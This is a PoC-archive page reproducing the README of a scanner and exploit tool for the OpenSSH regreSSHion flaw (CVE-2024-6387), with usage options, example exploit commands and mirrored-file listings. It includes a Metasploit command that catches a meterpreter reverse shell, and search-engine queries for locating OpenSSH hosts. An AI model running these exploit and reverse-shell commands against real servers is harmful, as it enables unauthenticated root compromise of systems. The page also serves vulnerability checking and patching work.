Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-6387 PoC — Openssh: regresshion - race condition in ssh allows rce/dos

Source
https://github.com/oxapavan/CVE-2024-6387
Associated Vulnerability
Title:Openssh: regresshion - race condition in ssh allows rce/dos (CVE-2024-6387)
Description:A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.
Description
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
Readme
##  Description
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server

CVE-2024-6387.py is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH, specifically targeting the recently discovered `regreSSHion` vulnerability (CVE-2024-6387). This script facilitates rapid scanning of multiple IP addresses, domain names, and CIDR network ranges to detect potential vulnerabilities and ensure your infrastructure is secure.

A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog().



##  Details
You can find the technical details [here](https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt).

The flaw, discovered by researchers at Qualys in `May 2024`, and assigned the identifier CVE-2024-6387, is due to a signal handler race condition in sshd that allows unauthenticated remote attackers to execute arbitrary code as root.

"If a client does not authenticate within LoginGraceTime seconds (120 by default), then sshd's SIGALRM handler is called asynchronously and calls various functions that are not async-signal-safe," 

"A remote unauthenticated attacker can take advantage of this flaw to execute arbitrary code with root privileges."

## ⚙️ Usage
## Scanning OpenSSH Server  
> Requirement: python3 latest
```bash
### Command Line Arguments
mode: Selects the operation mode. Choices are scan or exploit.
-T, --targets: IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.
-f, --outputfile: File to save results to (e.g., result.json).
-g, --gracetimecheck: Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).
-n, --nic: Network NIC (default: 'eth0').
-o, --output: Output format for results (choices: 'csv', 'txt', 'json').
-p, --port: Port number to check or exploit (default: 22).
-s, --speed: Number of threads to increase race condition chances (default: 10).
-t, --timeout: Connection timeout in seconds (default: 1 second).
-H, --resolve-hostnames: Resolve Hostnames
```

### Examples

#### Scanning a single URL/IP

```bash
python3 CVE-2024-6387.py scan -T example.com -p 22
```

#### Running the exploit into one domain / ip

```bash
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0

```

# Escalation Process

### Catching payload
All you have to do is to run the command below first (change the {yourip} handler) and run the exploit afterwards with the command above 
```bash
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"
```

## Output
The tool provides color-coded output to the console for better readability:

Green: Successful connection or operation.
Red: Failed connection or error.
Yellow: Warnings or noteworthy information.
Cyan: General information or status updates.

##  Host Discovery 
- **Hunter**: `/product.name="OpenSSH"`
- **FOFA**: `app="OpenSSH"`
- **SHODAN**: `product:"OpenSSH"`
- **CENSYS**: `(openssh) and labels=remote-access`

##  References
- **Original Author**: [CVE-2024-6387 Scanner](https://github.com/xaitax/CVE-2024-6387_Check)
- **Original Author**: [CVE-2024-6387 PoC](https://github.com/zgzhang/cve-2024-6387-poc)

## Further Referencess
- http://www.openwall.com/lists/oss-security/2024/07/01/12
- https://bugzilla.redhat.com/show_bug.cgi?id=2294604
- https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
- https://ubuntu.com/security/CVE-2024-6387
- https://ubuntu.com/security/notices/USN-6859-1
- https://explore.alas.aws.amazon.com/CVE-2024-6387.html
- https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
- https://www.openssh.com/txt/release-9.8
- https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
- https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
- http://www.openwall.com/lists/oss-security/2024/07/01/13
File Snapshot

 [4.0K]  /data/pocs/ce0d34ab04d93f4e334f00fb9a896f1ca87fb58f
├── [ 15K]  7etsuo-regreSSHion.c
├── [ 18K]  CVE-2024-6387.py
└── [4.2K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →